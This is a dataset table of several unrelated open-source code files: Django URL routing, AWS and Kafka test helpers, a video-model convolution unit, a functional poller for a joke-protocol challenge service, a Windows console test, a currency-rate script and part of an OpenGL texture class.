max_stars_repo_path (string, length 4-245) | max_stars_repo_name (string, length 7-115) | max_stars_count (int64, 101-368k) | id (string, length 2-8) | content (string, length 6-1.03M)
---|---|---|---|---|
crits/ips/urls.py | dutrow/crits | 738 | 30995 | <reponame>dutrow/crits<filename>crits/ips/urls.py
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^search/$', views.ip_search, name='crits-ips-views-ip_search'),
url(r'^search/(?P<ip_str>\S+)/$', views.ip_search, name='crits-ips-views-ip_search'),
url(r'^details/(?P<ip>\S+)/$', views.ip_detail, name='crits-ips-views-ip_detail'),
url(r'^remove/$', views.remove_ip, name='crits-ips-views-remove_ip'),
url(r'^list/$', views.ips_listing, name='crits-ips-views-ips_listing'),
url(r'^list/(?P<option>\S+)/$', views.ips_listing, name='crits-ips-views-ips_listing'),
url(r'^bulkadd/$', views.bulk_add_ip, name='crits-ips-views-bulk_add_ip'),
url(r'^(?P<method>\S+)/$', views.add_update_ip, name='crits-ips-views-add_update_ip'),
]
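# Illustrative sketch (not part of the original file): the named routes above
# can be resolved elsewhere in the project with Django's reverse(); the IP
# value used here is an arbitrary assumption.
def example_ip_detail_url(ip='10.0.0.1'):
    from django.urls import reverse
    # resolves against the 'details/(?P<ip>\S+)/' pattern registered above
    return reverse('crits-ips-views-ip_detail', kwargs={'ip': ip})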
|
atlas/aws_utils/src/test/test_aws_bucket.py | DeepLearnI/atlas | 296 | 31018 | <filename>atlas/aws_utils/src/test/test_aws_bucket.py
import unittest
from mock import Mock
from foundations_spec import *
from foundations_aws.aws_bucket import AWSBucket
class TestAWSBucket(Spec):
class MockListing(object):
def __init__(self, bucket, files):
self._bucket = bucket
self._files = files
def __call__(self, Bucket, Prefix, Delimiter):
if Bucket != self._bucket:
return {}
return {
'Contents': [{'Key': Prefix + key} for key in self._grouped_and_prefixed_files(Prefix, Delimiter)],
'CommonPrefixes': [{'Prefix': Prefix + new_prefix} for new_prefix in self._unique_delimited_prefixes(Prefix, Delimiter)]
}
def _unique_delimited_prefixes(self, prefix, delimiter):
items = set()
# below is done to preserve order
for key in self._prefixes(prefix, delimiter):
if key not in items:
items.add(key)
yield key
def _prefixes(self, prefix, delimiter):
for key in self._prefixed_files(prefix):
if delimiter in key:
yield key.split(delimiter)[0]
def _grouped_and_prefixed_files(self, prefix, delimiter):
for key in self._prefixed_files(prefix):
if delimiter not in key:
yield key
def _prefixed_files(self, prefix):
prefix_length = len(prefix)
for key in self._files:
if key.startswith(prefix):
yield key[prefix_length:]
connection_manager = let_patch_mock(
'foundations_aws.global_state.connection_manager'
)
connection = let_mock()
mock_file = let_mock()
@let
def file_name(self):
return self.faker.name()
@let
def data(self):
return self.faker.sha256()
@let
def data_body(self):
mock = Mock()
mock.read.return_value = self.data
mock.iter_chunks.return_value = [self.data]
return mock
@let
def bucket_prefix(self):
return self.faker.name()
@let
def bucket_postfix(self):
return self.faker.uri_path()
@let
def bucket_name_with_slashes(self):
return self.bucket_prefix + '/' + self.bucket_postfix
@let
def upload_file_name_with_slashes(self):
return self.bucket_postfix + '/' + self.file_name
@let
def bucket(self):
return AWSBucket(self.bucket_path)
@let
def bucket_with_slashes(self):
return AWSBucket(self.bucket_name_with_slashes)
@let
def bucket_path(self):
return 'testing-bucket'
@let
def source_path(self):
return self.faker.name()
@let
def source_path_with_slashes(self):
return self.bucket_postfix + '/' + self.source_path
@set_up
def set_up(self):
self.connection_manager.bucket_connection.return_value = self.connection
def test_upload_from_string_uploads_data_to_bucket_with_prefix(self):
self.bucket_with_slashes.upload_from_string(self.file_name, self.data)
self.connection.put_object.assert_called_with(Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes, Body=self.data)
def test_exists_returns_true_when_file_exists_with_prefix(self):
self.bucket_with_slashes.exists(self.file_name)
self.connection.head_object.assert_called_with(Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
def test_download_as_string_downloads_data_from_bucket_with_prefix(self):
self.connection.get_object = ConditionalReturn()
self.connection.get_object.return_when({'Body': self.data_body}, Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
result = self.bucket_with_slashes.download_as_string(self.file_name)
self.assertEqual(self.data, result)
def test_download_to_file_downloads_data_from_bucket_with_prefix(self):
self.connection.get_object = ConditionalReturn()
self.connection.get_object.return_when({'Body': self.data_body}, Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
result = self.bucket_with_slashes.download_to_file(self.file_name, self.mock_file)
self.mock_file.write.assert_called_with(self.data)
def test_remove_removes_prefixed_files(self):
self.bucket_with_slashes.remove(self.file_name)
self.connection.delete_object.assert_called_with(Bucket=self.bucket_prefix, Key=self.upload_file_name_with_slashes)
def test_move_moves_prefixed_files(self):
self.bucket_with_slashes.move(self.source_path, self.file_name)
source_info = {'Bucket': self.bucket_prefix, 'Key': self.source_path_with_slashes}
self.connection.copy_object.assert_called_with(Bucket=self.bucket_prefix, CopySource=source_info, Key=self.upload_file_name_with_slashes)
def test_list_files_returns_empty(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
[]
)
self.assertEqual([], self._fetch_listing('*'))
def test_list_files_returns_all_results(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log']
)
self.assertEqual(['my.txt', 'scheduler.log'], self._fetch_listing('*'))
def test_list_files_returns_file_type_filter(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log']
)
self.assertEqual(['my.txt'], self._fetch_listing('*.txt'))
def test_list_files_returns_all_results_dot_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log']
)
self.assertEqual(['my.txt', 'scheduler.log'],
self._fetch_listing('./*'))
def test_list_files_returns_file_type_filter_dot_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log']
)
self.assertEqual(['my.txt'], self._fetch_listing('./*.txt'))
def test_list_files_returns_only_local_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log', 'path/to/some/other/files']
)
self.assertEqual(['my.txt', 'scheduler.log', 'path'], self._fetch_listing('*'))
def test_list_files_returns_only_sub_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['my.txt', 'scheduler.log', 'path/to/some/other/files']
)
self.assertEqual(['path/to/some/other/files'], self._fetch_listing('path/to/some/other/*'))
def test_list_files_returns_folder_within_sub_directory(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['path/to/some/other/files']
)
self.assertEqual(['path/to'], self._fetch_listing('path/*'))
def test_list_files_returns_arbitrary_filter(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_path,
['some_stuff_here', 'no_stuff_there', 'some_more_stuff_here']
)
self.assertEqual(['some_stuff_here', 'some_more_stuff_here'], self._fetch_listing('some_*_here'))
def test_list_files_supports_prefixes(self):
self.connection.list_objects_v2.side_effect = self.MockListing(
self.bucket_prefix,
[self.upload_file_name_with_slashes]
)
result = list(self.bucket_with_slashes.list_files('*'))
self.assertEqual([self.file_name], result)
def _fetch_listing(self, pathname):
generator = self.bucket.list_files(pathname)
return list(generator)
|
pykafka/test/utils.py | Instamojo/pykafka | 1,174 | 31027 | import time
import os
from pykafka.test.kafka_instance import KafkaInstance, KafkaConnection
def get_cluster():
"""Gets a Kafka cluster for testing, using one already running is possible.
An already-running cluster is determined by environment variables:
BROKERS, ZOOKEEPER, KAFKA_BIN. This is used primarily to speed up tests
in our Travis-CI environment.
"""
if os.environ.get('BROKERS', None) and \
os.environ.get('ZOOKEEPER', None) and \
os.environ.get('KAFKA_BIN', None):
# Broker is already running. Use that.
return KafkaConnection(os.environ['KAFKA_BIN'],
os.environ['BROKERS'],
os.environ['ZOOKEEPER'],
os.environ.get('BROKERS_SSL', None))
else:
return KafkaInstance(num_instances=3)
def stop_cluster(cluster):
"""Stop a created cluster, or merely flush a pre-existing one."""
if isinstance(cluster, KafkaInstance):
cluster.terminate()
else:
cluster.flush()
def retry(assertion_callable, retry_time=10, wait_between_tries=0.1, exception_to_retry=AssertionError):
"""Retry assertion callable in a loop"""
start = time.time()
while True:
try:
return assertion_callable()
except exception_to_retry as e:
if time.time() - start >= retry_time:
raise e
time.sleep(wait_between_tries)
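# Illustrative usage sketch (not part of the original module): reuse an
# already-running cluster via the environment variables described in
# get_cluster(), and poll an assertion with retry(). The paths and addresses
# below are assumptions, not real defaults.
def _example_reuse_running_cluster():
    os.environ['KAFKA_BIN'] = '/opt/kafka/bin'
    os.environ['BROKERS'] = 'localhost:9092'
    os.environ['ZOOKEEPER'] = 'localhost:2181'
    cluster = get_cluster()  # takes the KafkaConnection branch above
    try:
        attempts = {'n': 0}
        def _eventually_true():
            # stands in for a real assertion about consumer/producer state
            attempts['n'] += 1
            assert attempts['n'] >= 3, "not ready yet"
        retry(_eventually_true, retry_time=5, wait_between_tries=0.1)
    finally:
        stop_cluster(cluster)  # a pre-existing cluster is only flushed, not terminated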
|
mlcomp/contrib/model/video/resnext3d/r2plus1_util.py | megachester/mlcomp | 166 | 31046 | <gh_stars>100-1000
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import torch.nn as nn
def r2plus1_unit(
dim_in,
dim_out,
temporal_stride,
spatial_stride,
groups,
inplace_relu,
bn_eps,
bn_mmt,
dim_mid=None,
):
"""
Implementation of `R(2+1)D unit <https://arxiv.org/abs/1711.11248>`_.
Decompose one 3D conv into one 2D spatial conv and one 1D temporal conv.
Choose the middle dimensionality so that the total No. of parameters
in 2D spatial conv and 1D temporal conv is unchanged.
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temporal_stride (int): the temporal stride of the bottleneck.
spatial_stride (int): the spatial_stride of the bottleneck.
groups (int): number of groups for the convolution.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
bn_eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Note that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
dim_mid (Optional[int]): If not None, use the provided channel dimension
for the output of the 2D spatial conv. If None, compute the output
channel dimension of the 2D spatial conv so that the total No. of
model parameters remains unchanged.
"""
if dim_mid is None:
dim_mid = int(
dim_out * dim_in * 3 * 3 * 3 / (dim_in * 3 * 3 + dim_out * 3))
logging.info(
"dim_in: %d, dim_out: %d. Set dim_mid to %d" % (
dim_in, dim_out, dim_mid)
)
# 1x3x3 group conv, BN, ReLU
conv_middle = nn.Conv3d(
dim_in,
dim_mid,
[1, 3, 3], # kernel
stride=[1, spatial_stride, spatial_stride],
padding=[0, 1, 1],
groups=groups,
bias=False,
)
conv_middle_bn = nn.BatchNorm3d(dim_mid, eps=bn_eps, momentum=bn_mmt)
conv_middle_relu = nn.ReLU(inplace=inplace_relu)
# 3x1x1 group conv
conv = nn.Conv3d(
dim_mid,
dim_out,
[3, 1, 1], # kernel
stride=[temporal_stride, 1, 1],
padding=[1, 0, 0],
groups=groups,
bias=False,
)
return nn.Sequential(conv_middle, conv_middle_bn, conv_middle_relu, conv)
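# Illustrative sketch (not part of the original file): build one R(2+1)D unit
# and spell out the parameter-count argument from the docstring. The channel
# sizes used here are arbitrary assumptions.
def _example_r2plus1_unit():
    unit = r2plus1_unit(dim_in=64, dim_out=128, temporal_stride=1,
                        spatial_stride=1, groups=1, inplace_relu=True,
                        bn_eps=1e-5, bn_mmt=0.1)
    # dim_mid = int(128 * 64 * 27 / (64 * 9 + 128 * 3)) = 230, so the
    # 1x3x3 conv holds 64 * 230 * 9 weights and the 3x1x1 conv 230 * 128 * 3,
    # about 220.8k in total -- close to the 64 * 128 * 27 = 221.2k weights of
    # the full 3x3x3 convolution the pair replaces.
    return unit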
|
challenges/CNMP/poller/for-testing/machine.py | pingjuiliao/cb-multios | 473 | 31093 | <gh_stars>100-1000
#!/usr/bin/env python
#
# Copyright (C) 2014 Narf Industries <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from generator.actions import Actions
from random import choice, randint
from os.path import dirname, abspath, join
import imp
import random
import string
import sys
CNMP_DIR = dirname(dirname(dirname(abspath(__file__))))
sys.path.append(join(CNMP_DIR, "support"))
from jokes import Jokes
def random_alpha(a, b):
return ''.join(choice(string.letters) for _ in range(randint(a, b)))
def random_string(a, b):
chars = string.letters + string.digits
return ''.join(choice(chars) for _ in range(randint(a, b)))
def random_digits(a, b):
chars = string.digits
return ''.join(choice(chars) for _ in range(randint(a, b)))
class CNMP(Actions):
MAX_JOKES=256
MAX_JOKE_STRING_LEN=512
JOKE_ID_CHAR_LEN=11
CMD_CHAR_LEN=20
def _load_jokes(self):
self.state['jokes'] = Jokes().get_jokes()
def start(self):
self._load_jokes()
self.read(delim="\n",
expect="This is the Chuck Norris (joke) Management Protocol (CNMP).\n",
expect_format='asciic')
self.read(delim="\n",
expect="We know you need a break, so take some time and amuse yourself. " \
"If you have a good Chuck Norris joke, you can add it to our listing.\n",
expect_format='asciic')
def menu(self):
self.read(delim="\n",
expect="Enter one of these commands:\n",
expect_format='asciic')
self.read(delim="\n",
expect=" LIST - list all jokes\n",
expect_format='asciic')
self.read(delim="\n",
expect=" ADD - upload your own joke\n",
expect_format='asciic')
self.read(delim="\n",
expect=" COUNT - find out how many jokes we have to offer you\n",
expect_format='asciic')
self.read(delim="\n",
expect=" SHOW - show a joke\n",
expect_format='asciic')
self.read(delim="\n",
expect=" MENU - display this menu\n",
expect_format='asciic')
self.read(delim="\n",
expect=" HELP - you gotta be kididin' me!\n",
expect_format='asciic')
self.read(delim="\n",
expect=" QUIT - take off eh?\n",
expect_format='asciic')
def root_prompt(self):
self.read(delim='> ', expect='> ', expect_format='asciic')
def empty(self):
self.write("\x07")
def quit(self):
self.write("QUIT\x07")
expect_str = "Thanks for the laughs. Come back soon!\n"
self.read(delim='\n', expect=expect_str, expect_format='asciic')
return -1
def help(self):
self.write("HELP\x07")
expect_str = "Is our menu so extensive that you cannot remember all of the commands? " \
"Here, let me jog all 6 of your neurons:\n"
self.read(delim='\n', expect=expect_str, expect_format='asciic')
def list_jokes(self):
self.write("LIST\x07")
# joke is list of lines with format "joke_id: joke\n"
for idx, joke in enumerate(self.state['jokes'], 0):
self.read(delim='\n',
expect="{0}: {1}\n".format(idx, joke),
expect_format='asciic')
def count(self):
self.write("COUNT\x07")
# read count string
expect_str = "Current CNMP joke count is {0}. Enjoy!\n".format(len(self.state['jokes']))
self.read(delim='\n', expect=expect_str, expect_format='asciic')
def menu_cmd(self):
self.write("MENU\x07")
def bad_cmd_die(self):
# submit a bad command; will exit connection
# bad command: (self.CMD_CHAR_LEN chars w/o trailing '\x07')
# have to stay w/in CMD_CHAR_LEN else poller will fail attempting to
# write the extra bytes that the CB will never read
cmd = random_string(self.CMD_CHAR_LEN, self.CMD_CHAR_LEN)
expect_str = "\nAre you kidding me? What is that garbage? " \
"I thought my instructions were pretty straight forward. " \
"Try again.\n"
self.write('{0}'.format(cmd))
self.read(delim='.\n', expect=expect_str, expect_format='asciic')
return -1
def add_msg(self):
expect_str = ""
self.write("ADD\x07")
self.read(delim="\n", expect="So, you think you have a good <NAME> joke? "\
"Give me the joke string already....\n", expect_format='asciic')
self.read(delim='> ', expect='ADD> ', expect_format='asciic')
# submit a bad message; will exit connection
# bad message: (> MAX_JOKE_STRING_LEN chars, i.e. MAX_JOKE_STRING_LEN*'A' w/o '\x07')
if self.chance(0.0001):
joke = random_string(self.MAX_JOKE_STRING_LEN, self.MAX_JOKE_STRING_LEN)
expect_str = "\nAre you kidding me? What is that garbage? " \
"I thought my instructions were pretty straight forward. " \
"Try again.\n"
self.write('{0}'.format(joke))
self.read(delim='.\n', expect=expect_str, expect_format='asciic')
return -1
# submit a bad joke
# bad joke (MAX_JOKE_STRING_LEN-1 chars, i.e (MAX_JOKE_STRING_LEN-1)*'A' + \x07)
elif self.chance(0.001):
joke = random_string(self.MAX_JOKE_STRING_LEN - 1, self.MAX_JOKE_STRING_LEN - 1)
expect_str = "\nThat joke you gave me is crap! " \
"For that, you get to start over!\n"
self.write('{0}\x07'.format(joke))
self.read(delim='!\n', expect=expect_str, expect_format='asciic')
else:
joke = random_string(1, self.MAX_JOKE_STRING_LEN - 2)
self.write('{0}\x07'.format(joke))
joke_count = len(self.state['jokes'])
if joke_count < self.MAX_JOKES:
# add a joke
expect_str = "Joke added. Thanks for sharing! Your joke is ID: {0}\n".format(joke_count)
self.state['jokes'].append(joke)
else:
# joke db is full
expect_str = "Lordy, lordy, I've had enough <NAME> jokes. Go away.\n"
self.read(delim='\n', expect=expect_str, expect_format='asciic')
def show(self):
expect_str = "Give me the ID of the joke you want to read. Or better yet, " \
"enter RANDOM and I'll choose one for you.\n"
self.write("SHOW\x07")
self.read(delim="\n", expect=expect_str, expect_format="asciic")
def show_prompt(self):
expect_str = 'SHOW> '
self.read(delim='> ', expect=expect_str, expect_format='asciic')
def show_msg_good(self):
expect_str = ""
expect_format='asciic'
joke_id = ""
# find the easteregg joke
if self.chance(0.001):
joke_id = "1337"
expect_str = "Congratulations, you are the only person in the past, present " \
"or future to beat <NAME>.\n"
else:
# choose a RANDOM joke
if self.chance(0.2):
joke_id = "RANDOM"
expect_str = "[0-9]+: (.*)\n"
expect_format='pcre'
else:
# id form 0 to joke_count - 1
joke_count = len(self.state['jokes'])
joke_id = str(randint(0, joke_count - 1))
expect_str = "{0}: {1}\n".format(joke_id, self.state['jokes'][int(joke_id)])
self.write("{0}\x07".format(joke_id))
self.read(delim='\n', expect=expect_str, expect_format=expect_format)
def show_msg_bad(self):
# submit a bad joke id, w/ len < self.JOKE_ID_CHAR_LEN
joke_id = ""
if self.chance(0.33):
# numeric < 0
joke_id = "-1{0}".format(random_digits(1,self.JOKE_ID_CHAR_LEN - 5))
elif self.chance(0.33):
#not numeric that is not "RANDOM", w/ len < self.JOKE_ID_CHAR_LEN
joke_id = random_alpha(1, self.JOKE_ID_CHAR_LEN - 1)
if joke_id == "RANDOM":
joke_id = random_alpha(1, self.JOKE_ID_CHAR_LEN - 1)
# submit a bad joke id w/ len = self.JOKE_ID_CHAR_LEN w/o '\x07'
# will exit connection
elif self.chance(0.0001):
joke_id = "1{0}".format(random_digits(self.JOKE_ID_CHAR_LEN-1, self.JOKE_ID_CHAR_LEN-1))
self.write("{0}".format(joke_id))
expect_str = "\nAre you kidding me? What is that garbage? " \
"I thought my instructions were pretty straight forward. Try again.\n"
self.read(delim='.\n', expect=expect_str, expect_format='asciic')
return -1
else:
# number >= len(jokedb), not 1337, w/ len < self.JOKE_ID_CHAR_LEN
joke_id = len(self.state['jokes']) + 1338
self.write("{0}\x07".format(joke_id))
expect_str = "\nWhat do you take me for? That ID is bogus! Try again.\n"
self.read(delim='.\n', expect=expect_str, expect_format='asciic')
|
venv/Lib/site-packages/zmq/tests/test_win32_shim.py | ajayiagbebaku/NFL-Model | 603 | 31097 | <filename>venv/Lib/site-packages/zmq/tests/test_win32_shim.py<gh_stars>100-1000
from __future__ import print_function
import os
import time
import sys
from functools import wraps
from pytest import mark
from zmq.tests import BaseZMQTestCase
from zmq.utils.win32 import allow_interrupt
def count_calls(f):
@wraps(f)
def _(*args, **kwds):
try:
return f(*args, **kwds)
finally:
_.__calls__ += 1
_.__calls__ = 0
return _
@mark.new_console
class TestWindowsConsoleControlHandler(BaseZMQTestCase):
@mark.new_console
@mark.skipif(not sys.platform.startswith('win'), reason='Windows only test')
def test_handler(self):
@count_calls
def interrupt_polling():
print('Caught CTRL-C!')
from ctypes import windll
from ctypes.wintypes import BOOL, DWORD
kernel32 = windll.LoadLibrary('kernel32')
# <http://msdn.microsoft.com/en-us/library/ms683155.aspx>
GenerateConsoleCtrlEvent = kernel32.GenerateConsoleCtrlEvent
GenerateConsoleCtrlEvent.argtypes = (DWORD, DWORD)
GenerateConsoleCtrlEvent.restype = BOOL
# Simulate CTRL-C event while handler is active.
try:
with allow_interrupt(interrupt_polling) as context:
result = GenerateConsoleCtrlEvent(0, 0)
# Sleep so that we give time to the handler to
# capture the Ctrl-C event.
time.sleep(0.5)
except KeyboardInterrupt:
pass
else:
if result == 0:
raise WindowsError()
else:
self.fail('Expecting `KeyboardInterrupt` exception!')
# Make sure our handler was called.
self.assertEqual(interrupt_polling.__calls__, 1)
|
requests__examples/yahoo_api__rate_currency.py | DazEB2/SimplePyScripts | 117 | 31104 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# TODO: use http://www.cbr.ru/scripts/Root.asp?PrtId=SXML or figure out the data returned by query.yahooapis.com
#       (some of its parameters are unclear)
# TODO: add a console interface
# TODO: add a GUI
# TODO: add a server
import requests
rs = requests.get('https://query.yahooapis.com/v1/public/yql?q=select+*+from+yahoo.finance.xchange+where+pair+=+%22USDRUB,EURRUB%22&format=json&env=store%3A%2F%2Fdatatables.org%2Falltableswithkeys&callback=')
print(rs.json())
for rate in rs.json()['query']['results']['rate']:
print(rate['Name'], rate['Rate'])
|
PyEngine3D/OpenGLContext/Texture.py | ubuntunux/PyEngine3D | 121 | 31111 | import traceback
import copy
import gc
from ctypes import c_void_p
import itertools
import array
import math
import numpy as np
from OpenGL.GL import *
from PyEngine3D.Common import logger
from PyEngine3D.Utilities import Singleton, GetClassName, Attributes, Profiler
from PyEngine3D.OpenGLContext import OpenGLContext
def get_numpy_dtype(data_type):
if GL_BYTE == data_type:
return np.int8
elif GL_UNSIGNED_BYTE == data_type:
return np.uint8
elif GL_SHORT == data_type:
return np.int16
elif GL_UNSIGNED_SHORT == data_type:
return np.uint16
elif GL_INT == data_type:
return np.int32
elif GL_UNSIGNED_INT == data_type:
return np.uint32
elif GL_UNSIGNED_INT64 == data_type:
return np.uint64
elif GL_FLOAT == data_type:
return np.float32
elif GL_DOUBLE == data_type:
return np.float64
logger.error('Cannot convert to numpy dtype. UNKNOWN DATA TYPE(%s)', data_type)
return np.uint8
def get_internal_format(str_image_mode):
if str_image_mode == "RGBA":
return GL_RGBA8
elif str_image_mode == "RGB":
return GL_RGB8
elif str_image_mode == "L" or str_image_mode == "P" or str_image_mode == "R":
return GL_R8
else:
logger.error("get_internal_format::unknown image mode ( %s )" % str_image_mode)
return GL_RGBA8
def get_texture_format(str_image_mode):
if str_image_mode == "RGBA":
# R,G,B,A order. GL_BGRA is faster than GL_RGBA
return GL_RGBA # GL_BGRA
elif str_image_mode == "RGB":
return GL_RGB
elif str_image_mode == "L" or str_image_mode == "P" or str_image_mode == "R":
return GL_RED
else:
logger.error("get_texture_format::unknown image mode ( %s )" % str_image_mode)
return GL_RGBA
def get_image_mode(texture_internal_format):
if texture_internal_format in (GL_RGBA, GL_BGRA):
return "RGBA"
elif texture_internal_format in (GL_RGB, GL_BGR):
return "RGB"
elif texture_internal_format == GL_RG:
return "RG"
elif texture_internal_format in (GL_R8, GL_R16F, GL_RED, GL_DEPTH_STENCIL, GL_DEPTH_COMPONENT):
return "R"
elif texture_internal_format == GL_LUMINANCE:
return "L"
else:
logger.error("get_image_mode::unknown image format ( %s )" % texture_internal_format)
return "RGBA"
def CreateTexture(**texture_datas):
texture_class = texture_datas.get('texture_type', Texture2D)
if texture_class is not None:
if type(texture_class) is str:
texture_class = eval(texture_class)
return texture_class(**texture_datas)
return None
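# Illustrative sketch (not part of the original file): CreateTexture accepts
# the class name as a string and forwards the remaining keyword arguments.
# The texture name and size below are assumptions, and a current OpenGL
# context is required for the call to succeed.
def _example_create_texture():
    return CreateTexture(name='example_diffuse', texture_type='Texture2D',
                         image_mode='RGBA', width=256, height=256)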
class Texture:
target = GL_TEXTURE_2D
default_wrap = GL_REPEAT
use_glTexStorage = False
def __init__(self, **texture_data):
self.name = texture_data.get('name')
self.attachment = False
self.image_mode = "RGBA"
self.internal_format = GL_RGBA8
self.texture_format = GL_RGBA
self.sRGB = False
self.clear_color = None
self.multisample_count = 0
self.width = 0
self.height = 0
self.depth = 1
self.data_type = GL_UNSIGNED_BYTE
self.min_filter = GL_LINEAR_MIPMAP_LINEAR
self.mag_filter = GL_LINEAR
self.enable_mipmap = False
self.wrap = self.default_wrap
self.wrap_s = self.default_wrap
self.wrap_t = self.default_wrap
self.wrap_r = self.default_wrap
self.buffer = -1
self.sampler_handle = -1
self.attribute = Attributes()
self.create_texture(**texture_data)
def create_texture(self, **texture_data):
if self.buffer != -1:
self.delete()
self.attachment = False
self.image_mode = texture_data.get('image_mode')
self.internal_format = texture_data.get('internal_format')
self.texture_format = texture_data.get('texture_format')
self.sRGB = texture_data.get('sRGB', False)
self.clear_color = texture_data.get('clear_color')
self.multisample_count = 0
if self.internal_format is None and self.image_mode:
self.internal_format = get_internal_format(self.image_mode)
if self.texture_format is None and self.image_mode:
self.texture_format = get_texture_format(self.image_mode)
if self.image_mode is None and self.texture_format:
self.image_mode = get_image_mode(self.texture_format)
# Convert to sRGB
if self.sRGB:
if self.internal_format == GL_RGB:
self.internal_format = GL_SRGB8
elif self.internal_format == GL_RGBA:
self.internal_format = GL_SRGB8_ALPHA8
if GL_RGBA == self.internal_format:
self.internal_format = GL_RGBA8
if GL_RGB == self.internal_format:
self.internal_format = GL_RGB8
self.width = int(texture_data.get('width', 0))
self.height = int(texture_data.get('height', 0))
self.depth = int(max(1, texture_data.get('depth', 1)))
self.data_type = texture_data.get('data_type', GL_UNSIGNED_BYTE)
self.min_filter = texture_data.get('min_filter', GL_LINEAR_MIPMAP_LINEAR)
self.mag_filter = texture_data.get('mag_filter', GL_LINEAR) # GL_LINEAR_MIPMAP_LINEAR, GL_LINEAR, GL_NEAREST
mipmap_filters = (GL_LINEAR_MIPMAP_LINEAR, GL_LINEAR_MIPMAP_NEAREST,
GL_NEAREST_MIPMAP_LINEAR, GL_NEAREST_MIPMAP_NEAREST)
self.enable_mipmap = self.min_filter in mipmap_filters
if self.target == GL_TEXTURE_2D_MULTISAMPLE:
self.enable_mipmap = False
self.wrap = texture_data.get('wrap', self.default_wrap) # GL_REPEAT, GL_CLAMP
self.wrap_s = texture_data.get('wrap_s')
self.wrap_t = texture_data.get('wrap_t')
self.wrap_r = texture_data.get('wrap_r')
self.buffer = -1
self.sampler_handle = -1
# texture parameter overwrite
# self.sampler_handle = glGenSamplers(1)
# glSamplerParameteri(self.sampler_handle, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)
# glBindSampler(0, self.sampler_handle)
logger.info("Create %s : %s %dx%dx%d %s mipmap(%s)." % (
GetClassName(self), self.name, self.width, self.height, self.depth, str(self.internal_format),
'Enable' if self.enable_mipmap else 'Disable'))
self.attribute = Attributes()
def __del__(self):
pass
def delete(self):
logger.info("Delete %s : %s" % (GetClassName(self), self.name))
glDeleteTextures([self.buffer, ])
self.buffer = -1
def get_texture_info(self):
return dict(
texture_type=self.__class__.__name__,
width=self.width,
height=self.height,
depth=self.depth,
image_mode=self.image_mode,
internal_format=self.internal_format,
texture_format=self.texture_format,
data_type=self.data_type,
min_filter=self.min_filter,
mag_filter=self.mag_filter,
wrap=self.wrap,
wrap_s=self.wrap_s,
wrap_t=self.wrap_t,
wrap_r=self.wrap_r,
)
def get_save_data(self):
save_data = self.get_texture_info()
data = self.get_image_data()
if data is not None:
save_data['data'] = data
return save_data
def get_mipmap_size(self, level=0):
if 0 < level:
divider = 2.0 ** level
width = max(1, int(self.width / divider))
height = max(1, int(self.height / divider))
return width, height
return self.width, self.height
def get_image_data(self, level=0):
if self.target not in (GL_TEXTURE_2D, GL_TEXTURE_2D_ARRAY, GL_TEXTURE_3D):
return None
level = min(level, self.get_mipmap_count())
dtype = get_numpy_dtype(self.data_type)
try:
glBindTexture(self.target, self.buffer)
data = OpenGLContext.glGetTexImage(self.target, level, self.texture_format, self.data_type)
# convert to numpy array
if type(data) is bytes:
data = np.fromstring(data, dtype=dtype)
else:
data = np.array(data, dtype=dtype)
glBindTexture(self.target, 0)
return data
except:
logger.error(traceback.format_exc())
logger.error('%s failed to get image data.' % self.name)
logger.info('Try to glReadPixels.')
glBindTexture(self.target, self.buffer)
fb = glGenFramebuffers(1)
glBindFramebuffer(GL_FRAMEBUFFER, fb)
data = []
for layer in range(self.depth):
if GL_TEXTURE_2D == self.target:
glFramebufferTexture2D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_2D, self.buffer, level)
elif GL_TEXTURE_3D == self.target:
glFramebufferTexture3D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_3D, self.buffer, level, layer)
elif GL_TEXTURE_2D_ARRAY == self.target:
glFramebufferTextureLayer(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, self.buffer, level, layer)
